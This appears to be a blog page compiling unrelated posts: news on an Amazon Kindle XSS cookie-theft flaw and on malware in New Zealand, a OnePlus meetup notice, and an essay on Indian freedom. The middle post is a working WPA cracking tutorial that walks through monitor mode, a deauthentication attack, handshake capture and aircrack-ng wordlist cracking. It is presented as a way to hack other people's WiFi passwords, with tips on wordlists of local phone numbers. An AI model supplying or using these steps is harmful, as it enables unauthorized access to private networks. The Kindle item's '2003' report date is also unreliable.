Amazon account cookies can get stolen just by downloading a Kindle ebook!

A security researcher has reported what appears to be an embarrassing flaw on Amazon’s website that could put Kindle users at high risk.

Benjamin Daniel Mussler claims that the “Manage Your Content and Devices” and “Manage Your Kindle” services on Amazon’s web-based Kindle Library are vulnerable to a cross-site scripting (XSS) attack, which can be exploited by a boobytrapped eBook title.

When this boobytrapped eBook is added to the intended victim’s library, the code will be automatically executed when the Kindle Library webpage is opened.
According to Mussler this means that “Amazon account cookies can be accessed by and transferred to the attacker and the victim’s Amazon account can be compromised”.

Well its unlikely to find an eBook with a maliciously-crafted title in the official Kindle eBook store, provided Amazon keeps its eyes open. Instead, the only real chance that you might fall victim to the vulnerability is if you pirate eBooks, downloading them from online web sources and use Amazon’s “Send to Kindle” service to have them accessible on your reader.

Mussler says he first reported the vulnerability to Amazon in November 2003, along with an example eBook that ran proof-of-concept eBook that grabbed cookies and sent them to him. Amazon’s technical team managed to fix the flaw within four days, nice!
But....
To Mussler’s shock, the very same vulnerability was introduced approximately two months ago, and currently remains unfixed. The researcher informed Amazon that the security hole has re-emerged, but received no response from the company.

For that reason, Mussler has decided to go public with his findings. Amazon needs to fix the security hole, even if it is only likely to be a risk for a small number of Kindle users, and fix it permanently.

In the meantime, Kindle users are advised to get their eBooks from official stores, just to be on the safe & secure!

Source

Fake Links to Nude Celebrities Crashes New Zealand's Internet

Users in New Zealand keen to view hacked photos of naked celebrities are being blamed for a nationwide lnternet meltdown involving the country's main provider.

New Zealanders be like....

It is believed that a handful of computer users clicked links on Friday evening believing they would take them to the illicit images, but instead they inadvertently installed malware triggering a crippling Internet attack.

It took telecommunications giant Spark until Sunday to fully repair what it termed a "dynamic" cybereattack that overloaded its system covering more than 600,000 customers. Spark tweeted it was aware that when people clicked on some links they inadvertently installed malware.

People just pissed off as even Google can't find for them lol

Computer security specialists Trend Micro issued an alert shortly before the attack began, warning not to open the links related to the nude celebrities. "For obvious reasons, clicking on links to 'naked celebrity' photos, or opening email attachments would be a very bad idea right now, expect criminals to ride this bandwagon immediately," it said.

Trend Micro said users who clicked the link offering to show a video of the actress were directed to download a "video converter" that was actually a malicious software.
New Zealand authorities said they did not know who was behind the attack, which was launched from outside the country, and the malware was generating denial-of-service attacks towards Europe.

People just can't stop themselves from searching for those nudes as they have "hope on the Internet", but it gets even tougher as Reddit Shuts down the subreddit 'The Fappening' which was the major source for the pics

"hope on the Interest"

Wifi Hacking Tutorial with Backtrack

Hacking is an art, a skill and today we'll be talking about how to hack a wifi password!

Things you require :
- Backtrack 5 OS
- A Computer with Wifi & DVD drive
- codes
- & Your Brain!

To start off, download the Backtrack OS here via torrent BT5R3 32bit , BT5R3 64bit and burn it in a blank cd via this software Imgburn. (any doubts about how to do that, Google it or ask)

Then insert that cd in your PC & reboot it, it may start directly via the DVD or if it doesn't, then while your pc starts Press the Function key to go into the boot menu option (F8 for my intel motherboard, it's different for others) the select the DVD drive as boot device, then enter.

click to zoom

The above screen will appear, Wait for 30 secs and it'll start via the live DVD, at the end type "startx" then press enter when your reach the stage as given in the pic below.

click to zoom

Next step is to open the console, which is found on the top toolbar.

Step 1 : type "airmon-ng" & press enter.
(this will detect your wifi card)

Step 2 : type "airmon-ng start wlan0"
(this starts the monitor mode)

Step 3 : type "airodump-ng --encrypt wpa mon0"
(this scans the wifi networks available)

press ctrl+C to stop the scan,
Now select the wifi network you need to hack, I'll be hacking nerdsmasher! here.

Step 4 : type "airodump-ng -w nerdsmasher! --encrypt wpa -c 1 --bssid AA:BE:19:63:B9:20 mon0"
(this will target only the required network)

In this stage, you compulsory need a host connected to the network, unless it won't work and you'll have to try that again later, evenings works good.

When you get a host connected, keep the window as it is & open a new terminal and type there..
Step 5 : "aireplay-ng -0 0 -a AA:BE:19:63:B9:20 -c CC:C3:EA:75:CB:78 mon0"

Now wait till you get a handshake on the first window as shown below.

The hacking part is done, so close both the windows, and let's crack the password now.

Open up a new terminal.

Type "aircrack-ng -w (drag the wordlist here) (drag the crack file here)" then press enter

root folder , .cap file

Now wait for the password.
....
And boom!

Note :
Backtrack has 2 wordlists already inbuilt in
File manager > pentest > passwords > wordlists,
you can use those, or download a huge wordlist from the internet, you'll find that easily.
You can also create a wordlist with local mobile numbers as mostly people keep their mobile numbers as their wifi passwords, I have created such wordlists with mobile numbers of Maharashtra & Mumbai circle, as you might see in the above pics.
Use the internet tools to create such mobile directories.

Have fun!

If you have any doubts please feel free to message us on our Facebook Page Here , and make sure that you like it too!

OnePlus and FoneArena to Host a OnePlus Fan Meetup in India

As OnePlus One is coming soon to India, the OnePlus team is already here, maybe to finalize the job place of General Manager which they listed a week back on their website.

So here's the news OnePlus team & Fonearena has decided to host a OnePlus Fan Meetup in Bangalore, India on 4th of September. Many people wants the One, in my view it's the only Smartphone with great specs & low price.

A few members of the OnePlus Team will be present at the event along with some of the members from the FoneArena team. Attendees can interact with all of team and also get a chance to play with the device, to feel the One! Also, this event gives you an opportunity to get all your queries answered, like the guarantee issues or the Service Centers availability.

To make this event even more interesting, the OnePlus team will be giving away some of the coolest and exclusive OnePlus branded merchandise like T-shits,bags and pens. Even a OnePlus One unit to one of the lucky fans at the venue. For this register yourself for our grand event in the link below or at the source link at the end.

CLICK HERE TO RSVP – for the OnePlus India Fan Meetup in Bangalore on on September 4th, Thursday between 4PM to 7PM.

Note: Space is limited so its first fill first serve basis.

Source : FoneArena

The truth about our freedom

The truth about our freedom

India gained independence in 1947, when the clock struck 00:00, on August 15th,thus releasing us from the harsh, evil and India's worst times ever.

Today's generation was never a part of this freedom struggle, and we do not know of the hardships, the problems, the misery, the risks, that our forefathers went through nor can we ever relate to the kind of patriotism they had for India.

A salute to all the freedom-fighters and people who sacrificed for our country, and to all those who shed blood for our motherland, knowing that they will never see the light of a free India.

A span of 68 years has gone by after that glorious victory. 

Now let me come to the core point of my blog and ask all you readers, a pressing question and I want all of you to answer it, analyse it, not be credulous and try to ponder over it.

Have we really achieved freedom?

Now, before you make any impulsive decision and judge me to be a vile person, let me answer it for you.

No. We never achieved freedom. It is true, that we are free from the chains of the British, but as a human being, are we really free? Are we really independent?

No again. Many of you are likely to disagree with me, but this is the part where I need you to do the opposite and simply read on!

Let's take an example of the recent incidents that has shed light on the numerous rape cases that has occurred in our country and has been occurring in our country, which has left many women scared to even leave their homes in the evening and lead a normal life like others, let alone the statements made by various politicians that blame the women as the driving cause for such horrendous incidents. 

For each and every decision they take, they have to think more than twice. So, if you think we have achieved independence then, people, yo have painted the wrong picture.

This is curbing freedom. We are still not free from the people of our own country. 

Think about this and let's join hands and take the first step towards freeing ourselves!

If you still think otherwise, and feel that this is not a cogent explanation follow this blog for more on such social issues.

Have a good day. 

“I am no bird; and no net ensnares me: I am a free human being with an independent will.” 
― Charlotte Brontë, Jane Eyre